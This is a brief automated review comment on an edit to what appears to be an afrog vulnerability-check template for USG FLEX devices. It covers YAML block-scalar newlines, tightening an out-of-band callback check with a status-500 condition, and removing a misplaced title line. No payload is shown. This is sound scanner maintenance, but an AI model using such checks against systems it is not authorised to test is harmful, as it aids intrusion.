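Review bot: switching `body` from a quoted string to a `|` literal block appends a trailing newline to the JSON payload, since a literal block scalar keeps its final line break; use `|-` if the request body is meant to stay byte-identical to the old quoted form. Requiring `response.status == 500` ahead of `reverse.wait(5)` is a sound tightening, because the out-of-band wait on its own would report success on any callback regardless of how the handler answered. The removed `title="USG FLEX"` line was sitting inside the description where afrog does not evaluate it, so dropping it loses nothing.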